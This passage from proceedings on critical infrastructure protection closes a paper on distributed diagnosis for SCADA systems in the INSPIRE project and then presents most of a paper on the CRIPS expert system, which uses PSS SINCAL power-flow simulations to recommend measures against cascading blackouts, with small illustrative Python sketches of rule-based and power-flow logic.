One-shot collection of a syndrome, typical of traditional diagnostic models [11], is not effective. Threshold-based mechanisms [12] – which have proved beneficial, especially in on-line diagnosis – fail to capture the complexity of the interdependencies among individual sub-systems. We claim that, in order to be effective for SCADA systems, diagnostic activities must i) collect data on individual components' behaviour over time [21], ii) correlate events which are observed at different architectural levels, and iii) identify event patterns which represent or precede system failures. To this end, centralized data collection and processing is not a viable option. In INSPIRE, we propose a distributed approach to SCADA systems diagnosis. One of the outputs of the INSPIRE project will be the definition of a distributed diagnosis framework, which will process in real time the information produced by multiple data feeds scattered all over the system. In order to do so, the diagnostic system will have to deal with diverse, heterogeneous sources and formats. Attempting to define a common format or to implement one adapter per format would not be viable. The proposed system will be able to generate parsers for specific data feeds automatically from a grammar, on a per-format basis [19]. Collected data will then be processed using Complex Event Processing (CEP) technologies, such as Borealis [20]. The types of faults/attacks that will be considered include:

– Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks - DoS attacks aim at lowering the availability of a service by preventing legitimate users from accessing it. DDoS attacks are a mutation of DoS attacks, where attacking actions are performed against the target host or service by multiple sources in a coordinated manner [13].
– Data Validation attacks - These attacks stem from poor validation of data provided by external sources. Sloppy validation of externally supplied data can lead to the whole system being compromised, as in the case of Buffer Overflow attacks.
– Passive attacks - A passive attack is conducted by an eavesdropper who exploits information leaks in the system. A passive attacker may compromise secrecy by exploiting covert channels, as in the case of timing attacks [14].
– Spoofing attacks - These kinds of attacks are accomplished by an attacker who impersonates a legitimate user or system to gain an illegitimate advantage.
– Hardware faults - These are faults stemming from instabilities of the underlying hardware platform, which manifest as errors at the software level [15]. We will limit our attention to intermittent and transient faults, since these are by far predominant [16].
– Software aging faults - Software aging is a phenomenon, usually caused by resource contention, which can lead to server hangs, panics, or crashes. Software aging mechanisms include memory bloating/leaks, unreleased file locks, accumulation of unterminated threads, shared-memory-pool latching, data corruption/round-off accrual, file-space fragmentation, thread stack bloating and overruns [17]. Recent studies [18] have shown that software aging is a major source of application and system unavailability. Software aging faults may still be present in the code base. As an example, a legacy application may exhibit memory leakage problems. A memory leak can go undetected for years if the application and/or the system is restarted relatively often (which might well be the case for a legacy application).

The fault/intrusion-treatment logic which we will propose will trigger recovery actions according to a least-costly-first strategy. Examples of recovery strategies, each one tailored to a specific class of errors/attacks, are:

– Restart of the component - This action can cure inconsistent component states (such as corrupted data structures), but it has no effect on errors which have propagated to the rest of the infrastructure.
– Reboot of the interconnection infrastructure - This action can fix erroneous states of the communication channels, but again it has no effect on errors which have propagated to the rest of the infrastructure.
– Restoration of stored data - Since multiple copies of relevant data may exist, attempts can be made to correct errors in the stored data.

Techniques will be developed for properly chaining/combining alternative diagnostic mechanisms. This will improve the performance of the diagnostic system by increasing the coverage while reducing false positives.
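The least-costly-first treatment logic could be sketched as follows; the cost figures, error classes and strategy mapping are invented for the illustration and do not reflect the actual INSPIRE framework:

```python
# Sketch of a least-costly-first recovery strategy selector (hypothetical
# costs and applicability mapping, for illustration only).

# Each strategy: (name, relative cost, error classes it can cure).
STRATEGIES = [
    ("restart_component", 1, {"inconsistent_state", "software_aging"}),
    ("reboot_interconnect", 5, {"channel_error"}),
    ("restore_stored_data", 10, {"data_corruption"}),
]

def plan_recovery(diagnosed_errors):
    """Return the cheapest sequence of actions covering all diagnosed errors."""
    plan, remaining = [], set(diagnosed_errors)
    for name, _cost, cures in sorted(STRATEGIES, key=lambda s: s[1]):
        if remaining & cures:
            plan.append(name)
            remaining -= cures
    if remaining:
        plan.append("escalate_to_operator")  # nothing cheap cures these
    return plan

print(plan_recovery({"software_aging", "data_corruption"}))
# ['restart_component', 'restore_stored_data']
```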
4 Related Work

In this section the main research initiatives in the area of Critical Information Infrastructure Protection are presented, emphasizing potential relationships with INSPIRE.

4.1 The IRRIIS Project

IRRIIS (Integrated Risk Reduction of Information-based Infrastructure Systems) is an EU Integrated Project aiming at protecting Large Complex Critical Infrastructures (LCCIs), like energy supply or telecommunication, by increasing the dependability, survivability and resilience of the underlying information-based infrastructures governing the LCCIs themselves. The main objectives of the IRRIIS project are to:

– Determine a sound set of public and private sector requirements based upon detailed scenario and data analysis.
– Develop MIT (Middleware Improved Technology), a collection of software components which facilitates IT-based communication between different infrastructures and different infrastructure providers.
– Build SimCIP (Simulation for Critical Infrastructure Protection), a simulation environment for controlled experimentation with a special focus on CI interdependencies. The simulator will be used to deepen the understanding of critical infrastructures and their interdependencies, to identify possible problems, to develop appropriate solutions, and to validate and test the MIT components.

There are two kinds of MIT components: MIT communication components to enhance the communication between various infrastructures and infrastructure providers, and MIT add-on components with some kind of built-in intelligence. The add-on components will monitor data flowing within and between the infrastructures, raise alarms in case of intrusions or emergencies, and take measures to avoid cascading effects. They will be able to detect anomalies, filter alarms according to their relevance and support recovery actions, and will thus contribute to the security and dependability of CIs.

4.2 The CRUTIAL Project

CRUTIAL (CRitical UTility InfrastructurAL Resilience) is a European IST research project, approved by the EU within the Sixth Framework Programme (FP6). The project addresses new networked ICT systems for the management of the electric power grid, in which artifacts controlling the physical process of electricity transportation need to be connected with information infrastructures, through corporate networks (intranets), which are in turn connected to the Internet. CRUTIAL's innovative approach resides in modeling interdependent infrastructures taking into account the multiple dimensions of interdependencies, and attempting to cast them into new architectural patterns, resilient to both accidental failures and malicious attacks. The objectives of the project are:

– investigation of models and architectures that cope with the scenario of openness, heterogeneity and evolvability endured by electrical utility infrastructures;
– analysis of critical scenarios in which faults in the information infrastructure provoke serious impacts on the controlled electric power infrastructure;
– investigation of distributed architectures enabling dependable control and management of the power grid.

CRUTIAL looks at the improvement of CI protection mainly focusing on their information systems and on their multi-dimensional interdependencies, attempting to cast them into new architectural patterns, resilient to both accidental failures and malicious attacks. Minor attention seems to be paid to the communication part. It is worth noting that the objectives of CRUTIAL and INSPIRE are not redundant but, on the contrary, complement each other. Furthermore, the approach of CRUTIAL, which considers the CI information systems interconnected by means of corporate networks (intranets) which are in turn connected to the Internet, goes exactly in the direction that INSPIRE has identified as a market trend, where information systems controlling the critical infrastructures are interconnected by means of commodity infrastructures.
4.3 The DESEREC Project

DESEREC is an Integrated Project of the Sixth Framework Programme of the European Union in the thematic area "Information Society Technologies", subprogramme area "Towards a global dependability and security framework", with the objective to define a framework to increase the dependability of existing and new networked Information Systems by means of an architecture based on modelling and simulation, fast reconfiguration with priority to critical activities, and incident detection and quick containment.

4.4 The SecurIST Project

SecurIST is a project whose main objective is to deliver a Strategic Research Agenda for ICT Security and Dependability Research and Development for Europe. The Strategic Research Agenda to be developed by the Security taskforce will elaborate the ICT Security and Dependability Research strategy beyond 2010. It will provide Europe with a clear European-level view of the strategic opportunities, strengths, weaknesses, and threats in the area of Security and Dependability. It will identify priorities for Europe, and mechanisms to effectively focus efforts on those priorities, identifying instruments for delivering on those priorities and a coherent time frame for delivery.

4.5 The RESIST Project

RESIST (Resilience for Survivability in ICT) is an FP6 Network of Excellence that addresses the strategic objective "Towards a global dependability and security framework" of the EU Work Programme, and responds to the stated "need for resilience, self-healing, dynamic content and volatile environments". It integrates leading researchers active in the multidisciplinary domains of Dependability, Security, and Human Factors, so that Europe will have a well-focused, coherent set of research activities aimed at ensuring that future "ubiquitous computing systems" – the immense systems of ever-evolving networks of computers and mobile devices which are needed to support and provide Ambient Intelligence (AmI) – have the necessary resilience and survivability, despite any residual development and physical faults, interaction mistakes, or malicious attacks and disruptions. The objectives of the Network are:

– integration of teams of researchers so that the fundamental topics concerning scalable resilient ubiquitous systems are addressed by a critical mass of co-operative, multi-disciplinary research;
– identification, in an international context, of the key research directions (both technical and socio-technical) induced on the supporting ubiquitous systems by the requirement for trust and confidence in AmI;
– production of significant research results (concepts, models, policies, algorithms, mechanisms) that pave the way for scalable resilient ubiquitous systems;
– promotion and propagation of a resilience culture in university curricula and in engineering best practices.
Besides the above-mentioned initiatives, we would also like to briefly present CI2RCO. The main objective of the Critical Information Infrastructure Research Co-ordination project is to create a European taskforce to encourage a co-ordinated Europe-wide approach for Research and Development on Critical Information Infrastructure Protection (CIIP), and to establish a European Research Area (ERA) on CIIP as part of the larger Information Society Technologies (IST) Strategic Objective to integrate and strengthen the ERA on Dependability and Security.
5 Conclusions

Supervisory Control And Data Acquisition (SCADA) systems collect and analyze data for real-time control. SCADA systems are extensively used in applications such as electrical power distribution, telecommunications, and energy refining. The connectivity of SCADA networks with outside networks is a relevant aspect which is leading to an increasing risk of cyber-attacks and a critical need to improve the security of these SCADA networks. In this paper we presented the INSPIRE project, which aims at ensuring the protection of critical information infrastructures through the design and development of techniques for securing networked process control systems. In particular, two of the INSPIRE objectives are (i) to adapt P2P architectures to SCADA systems to enhance their resilience to operational perturbations or deliberate breaches, and (ii) to design and develop a distributed diagnosis framework which processes in a real-time fashion the information produced by multiple and heterogeneous data feeds. To prove the effectiveness of the developed solutions, a working prototype of the INSPIRE framework will be implemented as a final demonstrator of selected scenarios.
References

1. Seungtaek, O., et al.: Closed P2P system for PVR-based file sharing. IEEE Transactions on Consumer Electronics 51(3) (2005)
2. Keong, L., et al.: A survey and comparison of peer-to-peer overlay network schemes. IEEE Communications Surveys and Tutorials (2005)
3. Wallach, D.S.: A survey of peer-to-peer security issues. In: Okada, M., Pierce, B.C., Scedrov, A., Tokuda, H., Yonezawa, A. (eds.) ISSS 2002. LNCS, vol. 2609, pp. 42–57. Springer, Heidelberg (2003)
4. Liang, J., Naoumov, N., Ross, K.: The Index Poisoning Attack on P2P File-Sharing Systems. In: Proc. of INFOCOM 2006 (2006)
5. P2P or Peer-to-Peer Safety, Privacy and Security. Federal Trade Commission (2004), http://www.ftc.gov/os/comments/p2pfileshare/OL-100005.pdf
6. Risson, J., Moors, T.: Survey of Research towards Robust Peer-to-Peer Networks: Search Methods. Technical Report UNSW-EE-P2P-1-1, University of New South Wales, Sydney (2004)
7. Mudhakar, S., Ling, L.: Vulnerabilities and security threats in structured overlay networks: A quantitative analysis. In: Proc. of the 20th Annual Computer Security Applications Conference (ACSAC) (2004)
8. Honghao, W., Yingwu, Z., Yiming, H.: An efficient and secure peer-to-peer overlay network. In: Proc. of the IEEE Conference on Local Computer Networks (2005)
9. Friedman, A., Camp, J.: Peer-to-Peer Security, Harvard University (2003), http://allan.friedmans.org/papers/P2Psecurity.pdf 10. Duma, C., Shahmehri, N., Turcan, E.: Resilient Trust for Peer-to-Peer Based Critical Information Infrastructures. In: Proceedings of 2nd International Conference on Critical Infrastructures (CRIS) (2004) 11. Mongardi, G.: Dependable Computing for Railway Control Systems. In: Proceedings of DCCA-3, Mondello, Italy, pp. 255–277 (1993) 12. Bondavalli, A., Chiaradonna, S., Di Giandomenico, F., Grandoni, F.: Threshold-Based Mechanisms to Discriminate Transient from Intermittent Faults. IEEE Transactions on Computers 49, 230–245 (2000) 13. Mirkovic, J., Martin, J., Reiher, P.: A Taxonomy of DDoS Attacks and DDoS Defense Mechanisms. UCLA Computer Science Department, Technical report N.020018 14. Kocher, P.C.: Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems. In: Koblitz, N. (ed.) CRYPTO 1996. LNCS, vol. 1109, pp. 104–113. Springer, Heidelberg (1996) 15. Goswami, K.K., Iyer, R.K.: Simulation of Software Behavior Under Hardware Faults. In: Proceedings of the 23rd Annual International Symposium on Fault-Tolerant Computing (1993) 16. Iyer, R.K., Tang, D.: Experimental Analysis of Computer System Fault Tolerance. In: Pradhan, D.K. (ed.) Fault-Tolerant Computer System Design, ch. 5. Prentice Hall Inc., Englewood Cliffs (1996) 17. Cassidy, K.J., Gross, K.C., Malekpour, A.: Advanced Pattern Recognition for Detection of Complex Software Aging Phenomena in Online Transaction Processing Servers. In: Proceedings of International Conference on Dependable Systems and Networks (2002) 18. Huang, Y., Kintala, C.M.R., Kolettis, N., Fulton, N.D.: Software Rejuvenation: Analysis, Module and Applications. In: FTCS 1995, pp. 381–390 (1995) 19. Campanile, F., Cilardo, A., Coppolino, L., Romano, L.: Adaptable Parsing of Real-Time Data Streams. In: Proceedings of 15th Euromicro International Conference on Parallel, Distributed, and Network-based Processing (PDP 2007) (February 2007) 20. Borealis Distributed Stream Processing Engine, http://www.cs.brown.edu/research/borealis/public/ 21. Serafini, M., Bondavalli, A., Suri, N.: On-Line Diagnosis and Recovery: On the Choice and Impact of Tuning Parameters. IEEE Transactions on Dependable and Secure Computing (October 2007)
Increase of Power System Survivability with the Decision Support Tool CRIPS Based on Network Planning and Simulation Program PSS®SINCAL

Christine Schwaegerl1, Olaf Seifert1, Robert Buschmann2, Hermann Dellwing2, Stefan Geretshuber2, and Claus Leick2

1 Siemens AG, Freyeslebenstrasse 1, 91058 Erlangen, Germany
{christine.schwaegerl,olaf.seifert}@siemens.com
2 IABG mbH, Einsteinstrasse 20, 85521 Ottobrunn, Germany
{buschmann,dellwing,geretshuber,leick}@iabg.de
Abstract. The increased interconnection and automation of critical infrastructures enlarges the complexity of the dependency structures and – as a consequence – the danger of cascading effects, e.g. causing area-wide blackouts in power supply networks, which since deregulation are operated closer to their limits. New tools, or an intelligent combination of existing approaches, are required to increase the survivability of critical infrastructures. Within the IRRIIS project, the expert system CRIPS was developed based on network simulations realised with PSS®SINCAL, an established tool supporting the analysis and planning of electrical power, gas, water or heat networks. CRIPS assesses the current situation in power supply networks by analysing the simulation results of the physical network behaviour and recommends corresponding decisions. This paper describes the interaction of the simulation tool PSS®SINCAL with the assessment and decision support tool CRIPS; a possible common use case is outlined and the benefits of this application are shown.

Keywords: Power supply network, planning, simulation, situation assessment, decision making, emergency management, expert system.
1 Introduction

The main goal of the European project IRRIIS (Integrated Risk Reduction of Information-based Infrastructure Systems) [1] is to develop so-called Middleware Improved Technology (MIT) components to support the control of power and telecommunication networks in order to mitigate the danger of blackouts in these networks. With open access to deregulated markets, increased power transfers are forcing the transmission systems to their limits. Renewable and dispersed generation, supported with priority interconnection and access to the network according to
legislation in almost all European countries, additionally leads to network congestion, especially from large wind farms that are located, e.g., in the North Sea far from load centres, or from high shares of dispersed generation units in distribution networks that may reverse power flows. To achieve higher economic objectives the systems are also operated closer to their limits, partly supported by increased network automation (monitoring and control), also known as smart grids. As a result, unexpected events, weak interconnections, high loading of lines, protection malfunction or problems with data transmission may cause the systems to lose stability – possibly leading to catastrophic failures or blackouts, as can be seen from the increased number of blackouts in recent years. An increased number of stakeholders with different responsibilities since the deregulation of the energy markets, along with high shares of dispersed and renewable generation units, also raises the danger of blackouts in distribution systems; thus intelligent software solutions are also required at the distribution level. Many control and simulation systems for transmission and, partly, distribution systems already exist for this purpose – special systems for control, and systems which can be used as "further support". However, these systems are only dedicated to special tasks, such as the estimation of power flows in the networks, and do not consider dependencies on other critical infrastructures or neighbouring utilities also participating in energy supply tasks. The PSS®SINCAL1 [2] program for system analysis and planning has been created to simulate, display and evaluate the steady-state and dynamic behaviour of power transmission and distribution systems. It calculates power flows in these networks based on the data of the components, corresponding to physical laws. CRIPS2 [3] is one of the so-called "MIT add-on components" which are developed in the frame of the IRRIIS project. It is realized as an expert system to support the assessment of the current situation – in the case of this paper, in power networks – and, as a conclusion of this assessment, to assist the network operator in the early detection of, and decision making in, emergency situations. CRIPS primarily does not directly use physical engineering knowledge; its knowledge base represents the experience resulting from operating the system and from corresponding crisis management exercises. Both systems – one operating on the physical level and one operating on a "meta-physical" level – should be combined in the sense of: installation and operation of a power system is based on physical laws, but not all problems in power networks can be "reached" by physical laws. Thus, a combination of PSS®SINCAL with CRIPS seems to be very effective for crisis management in the operation of power networks, to "mitigate the danger of large blackouts".
1 PSS® is a registered trademark of Siemens AG, comprising a comprehensive power system simulation suite.
2 Crisis Prevention and Planning System.
2 Subject Area
The technical part of the subject area is limited to the steady-state and dynamic simulation of electrical power flows. The meta-technical part of the subject area concerns the assessment of the current situation and the support of the resulting decisions, using in particular experiences and lessons learned – a way to take into account the complex dependencies which exist in critical infrastructures.

2.1 Simulation of the Power Flow
Time-dependent bottlenecks in a power system can be determined by a steady-state analysis such as a power flow analysis, which determines the loading of the network elements, such as lines (cables and overhead lines) or transformers, as well as the voltages at the nodes of the network. This information strongly depends on the available power generation, the current loads in the network, and the current operation of the network, e.g. with planned maintenance, and can then be used for the immediate assessment of the current situation. Dynamic simulations support the analysis of voltage and phase-angle stability in transmission networks.

2.2 Assessment of the Current Situation
The assessment of the current situation in the power network should more precisely be characterized as a "strategic assessment" of the current situation: the aim is not to identify normal day-to-day problems, but to identify in advance a situation which can cause an area-wide blackout of the power supply. Thus, not every possible overload – perhaps dangerous for a part of the power network – has its representation in the knowledge base. Only critical situations which can cause cascading effects and, as a result, a wide-area blackout are considered by corresponding rules in the knowledge base. The sources of this knowledge are the basic rules that must be met for stable network operation, the long-term experience with the operation of the grid, the content of emergency plans, the results of crisis management exercises, and the lessons learned from blackouts that have already happened. The assessment of the current situation is to answer the question: can the identified risks be accepted or not with regard to avoiding the danger of a wide-area blackout in the power supply grid?

2.3 Decision Making
How to deal with an identified critical situation that can cause an area-wide blackout? A canonical decision may be to immediately check compliance with the (n − 1)-criterion in the network, where it is verified whether an outage of an arbitrary network element may lead to unacceptable network conditions. Observance of this (n − 1)-criterion permits the provision of adequate service reliability (continuity of supply) for all network users, secure power transfers, and the provision of system services. The (n − 1)-criterion addresses all issues relating to network
technology, in particular the system services to be provided (e.g. voltage stability including the provision of reactive power), equipment utilization, the protection concept, and, where applicable, stability issues. Further decisions (or measures) are possible, such as:

– Network-related measures, for example switching selected lines on or off: this can resolve a critical loading situation of some lines due to changed load flows, and so a decrease of the danger is possible – but one has to know in which situations such a measure is successful and which lines should be switched. These measures can be taken without further costs.
– Market-related measures, for example redispatch or the activation of additional reserves (additional generation). These measures usually cause further costs.
– Emergency measures. These measures (automatically switching off a large number of consumers, disconnecting a wide area from power supply, etc.) affect a large number of customers, with different negative socio-economic impacts.

These decisions and measures are not obvious: the experience from exercises and the lessons learned from critical situations that have already happened have to be taken into account – this knowledge is implemented as facts and rules in the knowledge base of the expert system CRIPS. Decision support – taking into account dependencies – is to answer the question: what decisions lead to a de-escalation of the critical situation?

2.4 General Spectrum of CRIPS Tasks
CRIPS is designed to deal with dependency structures which cannot be described completely by deterministic – e.g. physical – laws or by corresponding methods. It shall provide an additional functionality to integrate the knowledge and know-how of experts, resulting from experience, lessons learned, etc. This kind of knowledge is represented by heuristic methods, and this is the reason why CRIPS is based on an expert system (see Section 4.2 for details about the structure of the knowledge base). So the characterizing quality of CRIPS is not its special application, but its method of representation and evaluation of knowledge, and so its general application is not restricted to the special application described in this paper. A more general application can be described as the evaluation of interdependencies between different systems or critical infrastructures, such as power supply and telecommunication networks. It is assumed that this heuristic approach to describing interdependencies between systems such as telecommunication networks, power supply networks, and gas pipeline systems, which are based on different physical laws, is suitable to deal with those complex and complicated dependency structures. Figure 1 gives an impression of the more general application field, independent of a specific system or critical infrastructure.
Fig. 1. CRIPS - General Spectrum of Tasks
3 Simulation with PSS®SINCAL

3.1 Introduction
PSS®SINCAL is well suited for the needs of both industry and utility companies. Typical user groups include municipal power companies, regional and national system operators, industrial plants, power stations and engineering consulting companies. PSS®SINCAL provides the system planner with high-performance tools for the planning and design of supply networks for a variety of critical infrastructures – for gas, district heating, electrical power and water. It comprises the powerful tools necessary for examining any network state and determining the most suitable network structure in normal and in emergency situations. The impact of switching operations can be analysed, and networks can be optimized with regard to losses and utilization.
3.2 Main Features
Input data of the networks to be calculated, equipment data and graphics data for true-location or schematic network representation, as well as the results of the various calculation methods – all data necessary for system planning – are stored in a commercial database, so data access is possible by standard methods.
The graphical user interface is the environment in which networks are drawn, defined and updated, calculations are started, results are displayed, and data import or export is done. It enables the user to enter and display networks in true-location or schematic form. The network and additional graphic information can be drawn and organized in different graphical layers. Different variants can be conveniently handled by PSS®SINCAL's variant management tool. Various steady-state and dynamic calculation methods are available. It is also possible to simulate the effect of time series (e.g. load curves) or time events (e.g. open circuit) on the network. Calculation results can be depicted in different ways (e.g. tables, screen forms, diagrams and reports) and evaluated in the network diagram by means of colouring in accordance with predefined criteria. For instance, "traffic-light colours" can indicate the state of system elements. The macro function of PSS®SINCAL enables the connection and synchronised calculation of separate networks. Furthermore, it enables the use of separately defined type databases in different network areas. The variant management tool organizes variants in a tree structure. Changes are automatically applied to subordinate variants. Each variant can be loaded, displayed and evaluated independently. The program system possesses computer network capability, i.e. IT resources such as printers, data security systems, etc. can be utilised. If required, data and results can be made accessible to other users. PSS®SINCAL is easy to integrate into any data environment because it is a "database application":

– Several import and export facilities are available based on ASCII files, such as PSS®E raw files (incl. graphics), PSS®NETOMAC, UCTE, DVG, ...
– A data import interface via SQL is provided.
– Even a simple-to-use EXCEL import can be used to get data (balanced or unbalanced domain data and even graphics) into PSS®SINCAL.
– A standard CIM (Common Information Model, on the basis of XML) import and export is embedded.
– PSS®SINCAL's complete database model is released to the user community in order to enable users to program their own interfaces to other software, or to develop their own add-on applications.

3.3 Simulation of Electrical Networks
A wide range of modules such as Power flow, Short circuit, Stability (RMS), Electromagnetic transients (EMT), Eigenvalues/modal analysis, Harmonics, Protection simulation, Contingency analysis, Reliability or Cost analysis allows almost all network-related tasks to be performed, such as operational and configuration planning, fault analysis, harmonic response, protection simulation and protection coordination. Several of the modules, especially those connected with protection systems, are also ideal for training purposes. The power flow calculation determines the weak points of the network. Different algorithms such as Newton-Raphson or current iteration are available for calculating the distribution of currents, voltages and loads in the network, even under
difficult circumstances, such as when several infeeds, transformer taps and poor supply voltages are involved. The graphical evaluation comprises, for example:

– display of overloaded system elements or isolated network parts;
– display of selected network regions of interest (not every element needs a graphical representation; text can be shown only at elements of interest);
– coloured network diagrams with selected results;
– diagrams (e.g. voltage profiles) showing the results along selected paths through the network.

As a first step, all data concerning the power system and the power of the transmission network have to be collected for further analysis during a system study. Essential data for this purpose are generator data (incl. data of controllers and governors), line data (cables, overhead lines), transformer data and load data.
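To make the kind of computation behind such weak-point screening concrete, the following is a minimal sketch of a DC load flow, the linearised approximation commonly used for screening studies; it is not PSS®SINCAL's actual implementation, and the four-bus network data are invented for illustration.

```python
import numpy as np

# Minimal DC power flow: solve B * theta = P, then derive line flows
# from the angle differences. Illustrative 4-bus example; bus 0 is the
# slack bus, reactances in p.u.
lines = [(0, 1, 0.1), (0, 2, 0.2), (1, 2, 0.15), (2, 3, 0.1)]  # (from, to, x)
P = np.array([0.0, -0.4, -0.3, 0.7])  # net injections per bus (p.u.), sum = 0

n = 4
B = np.zeros((n, n))
for f, t, x in lines:
    b = 1.0 / x
    B[f, f] += b; B[t, t] += b
    B[f, t] -= b; B[t, f] -= b

# Remove the slack bus row/column and solve for the remaining angles.
theta = np.zeros(n)
theta[1:] = np.linalg.solve(B[1:, 1:], P[1:])

# Line flows; overloaded lines would be flagged against their ratings.
for f, t, x in lines:
    print(f"flow {f}->{t}: {(theta[f] - theta[t]) / x:+.3f} p.u.")
```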
4 Support of Assessment and Decision Making by CRIPS

4.1 Paradigm
The current situation in a power network is presented in the control centres of the system operators. The results of a simulation – e.g. to confirm compliance with the (n − 1)-criterion – provide additional information. It has to be stated, however, that the operator has no explicit information on whether a situation presented on his monitor is critical in the sense of "this situation can cause a wide-area blackout": overloads can cause automatic switch-offs of lines, those switch-offs can in turn take further components out of operation, and the end of this cascade may be a local outage of power supply or a wide-area blackout, which is not acceptable. This is the topic of the assessment supported by CRIPS (see Section 2.2):

Assessment of data and information about the grid with regard to the danger of a wide-area blackout (critical situation).

The main scope of the decision support of CRIPS is not the support of day-to-day decisions; it is the support of

Making the right decision at the right time to stop the development of an identified critical situation towards a wide-area blackout,

based on the experience of experts resulting from lessons learned from blackouts that have already happened or from crisis management exercises.
4.2 Method
CRIPS shall ensure the "automatic availability" of expert knowledge concerning the assessment of the current situation in the networks and the corresponding decision making in case of detected critical situations (see Section 6). This knowledge is usually heuristic, and its canonical representation is a system of if-then-else rules. The core of CRIPS is therefore an expert system, and the rule-based representation of the knowledge takes into account the following experience (see [4], page 276):
"... knowledge bases from the real world often only include restricted clauses, so-called horn clauses ...":

$A_1 \wedge A_2 \wedge A_3 \wedge \ldots \wedge A_n \Rightarrow B$   (1)
Equation (1) describes horn clauses in an understandable way. It may seem a very simple and restricted formalism for describing knowledge. There may indeed be some restrictions concerning the knowledge representation, but this formalism ensures very effective and consistent maintenance of the knowledge base, which is necessary when there are essential changes in the networks. The basic structure of the knowledge base of CRIPS can thus be described by these "prototypical rules":

If data of components ≠ normal values, then a critical situation is given.   (2)
If a critical situation is given, then a decision is recommended.   (3)
With this simple but maintainable knowledge base, we can assume – taking into account [4] and experience from other expert system developments – that such a simply structured rule system provides sufficient support for situation assessment and decision making. The method thus guarantees both "sufficient support" and "effective maintenance".
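As an illustration of rules of the prototypical form (2)–(3), the following is a minimal sketch of a horn-clause rule base with simple forward chaining; the concrete conditions and recommendations are invented placeholders, not actual CRIPS rules.

```python
# Minimal sketch of a horn-clause rule base in the spirit of (2)-(3).
# Conditions and recommendations are illustrative placeholders.

RULES = [
    # premise (A1 and ... and An)                       -> conclusion B
    (lambda f: f.get("L25 overloaded") and f.get("L7 overloaded"),
     "critical situation: cascading risk"),
    (lambda f: f.get("critical situation: cascading risk"),
     "recommend: switch off line L70"),
]

def forward_chain(facts):
    """Apply the rules until no new conclusion can be derived."""
    changed = True
    while changed:
        changed = False
        for premise, conclusion in RULES:
            if premise(facts) and not facts.get(conclusion):
                facts[conclusion] = True
                changed = True
    return [fact for fact, true in facts.items() if true]

print(forward_chain({"L25 overloaded": True, "L7 overloaded": True}))
```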
5 Basics of the Interaction PSS®SINCAL – CRIPS

5.1 Simulation and Analysis with PSS®SINCAL
Results of simulations are stored in databases with graphical representation:
Fig. 2. Example for the Visualisation of Load flow Simulation Results
5.2 Situation Assessment and Decision Support with CRIPS
The assessment and the resulting decision support are done in the following way:

– Triggered by a special event, or periodically, an operator of a control centre performs a simulation with PSS®SINCAL – e.g. an (n − 1)-criterion compliance calculation of a grid or of a part of it, a load analysis of lines, etc.
– Via an interface, the resulting values of the power flow simulation are made available to CRIPS – no physical load flow results are transferred, only data which are indicators for a critical situation.
– CRIPS contains rules about "indicator components"³ for critical situations. The evaluation of the simulation data may indicate a critical situation.
– Depending on the critical situations, decisions are recommended.

The CRIPS procedure – called "CRIPS Guard" – works like a virus scanner on a computer system, and the results are presented as follows: CRIPS Guard permanently evaluates the result tables of PSS®SINCAL in order to find a critical situation. If such a situation occurs, CRIPS permanently generates the corresponding messages and proposed decisions.
This kind of assessment and decision support is not an automatism: the operator only receives a message about the situation and proposed, recommended, or possible decisions, but he makes the final decision.
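The scanning behaviour described above can be pictured with a small sketch of a guard-style polling loop; the result-table access and the single rule below are hypothetical placeholders, not the actual CRIPS Guard interface.

```python
import time

# Sketch of a background scanner in the CRIPS Guard style: it periodically
# reads indicator values derived from the simulator's result tables and
# reports any rule that fires. Table access and the rule are placeholders.

def read_result_table():
    # In a real coupling this would query the simulation result database.
    return {"L25_loading": 1.15, "L7_loading": 0.95}

def scan(indicators):
    findings = []
    if indicators["L25_loading"] > 1.1:
        findings.append(("critical situation: L25 overloaded",
                         "recommend: grid-related measure"))
    return findings

for _ in range(3):  # an operational guard would loop indefinitely
    for situation, decision in scan(read_result_table()):
        print(situation, "->", decision)  # operator keeps the final decision
    time.sleep(1)
```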
Fig. 3. Assessment and Decision Support with CRIPS
Figure 3 shows a scanning procedure of CRIPS. This kind of output – showing all steps of the whole scanning process – is only meant to demonstrate the functionality. CRIPS as an operational system works – like a virus scanner – in the background, and only significant results are presented. What is shown on the monitor of the CRIPS Guard:

– At the beginning of the scan (12:59:36) no critical situation is identified, so there are no recommended decisions.
– Then – because of changes in the grid – CRIPS finds a critical situation (and can give further explanations if desired).
– Decisions are recommended, in this case one "grid-related measure" and one "market-related measure".
– Scanning continues: the critical situations and the recommended measures are indicated until there is a change in the grid (e.g. by an operator).

³ At the moment, so-called "indicator components" are used to make the assessment. The use of further criteria – not depending on the status of these indicator components – is in progress.
5.3 The Procedure in Detail – A Generic Example
The example is based on the topology of an existing 110/20 kV network that was chosen as one scenario for further analysis in the IRRIIS project (Fig. 4).
Fig. 4. Network Topology for Blackout-Sequence Simulation by PSS®SINCAL
We assume a sequence of events which may be

– a real-time development in the grid, shown on the monitors in control centres;
– a weak-point analysis of the grid, done with PSS®SINCAL (see Sect. 3.3).

It may also be an action of a crisis management exercise, whose documented results provide new rules for the knowledge base of CRIPS. The following sequence of events for the network given in Fig. 4 (without technical details), simulated with PSS®SINCAL, leads to a blackout:
1. Line L1 switched off because of a thunderstorm (T0)
2. Line L25 automatically switched off by protection device (T1 = T0 + 5 min)
3. Line L7 automatically switched off by protection device (T2 = T1 + 10 min)
4. Northern lines automatically switched off by protection devices (T3 = T2 + 5 min)

——— "Point of no return – cascading effects" ———

5. Western lines automatically switched off by protection devices (T4 = T3 + 1 s)
6. Southern lines automatically switched off by protection devices (T5 = T4 + 1 s)

⇒ Blackout
CRIPS permanently scans the developments in the grid, and thus CRIPS detects the changes made by steps 1 to 6. Let us assume that CRIPS knows (via rules in the knowledge base) the criticality of this chain of events – e.g. as a result of a former exercise or as the experience of an accident that has already happened. CRIPS stops the cascade towards a blackout after step 3, because the operator acts on the assessment and the recommended decision (see Fig. 4):

Switch off line L70 (long name: P21h P13h)

After the realization of this decision, PSS®SINCAL and CRIPS identify no further critical situation; a possible CRIPS message is shown in Fig. 5.
Fig. 5. Result of the Decision Support by CRIPS
With this "network-related measure" – without further costs – the path to the point of no return has been interrupted. Note: in this example, CRIPS repeats the warnings for critical situations and the recommended decisions after every scanning step (a range of seconds). This is characteristic for decision support: the decision maker is not forced to realize the proposed decisions; the proposals are only a "support" for his decision making. A ranking of the critical situations, for the case that more than one critical situation is identified, will be realized.
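A rule that recognises the criticality of the chain of events in this example might, schematically, match the observed switching history against a known critical sequence; the matching logic below is illustrative, with the line names and the countermeasure taken from the example above.

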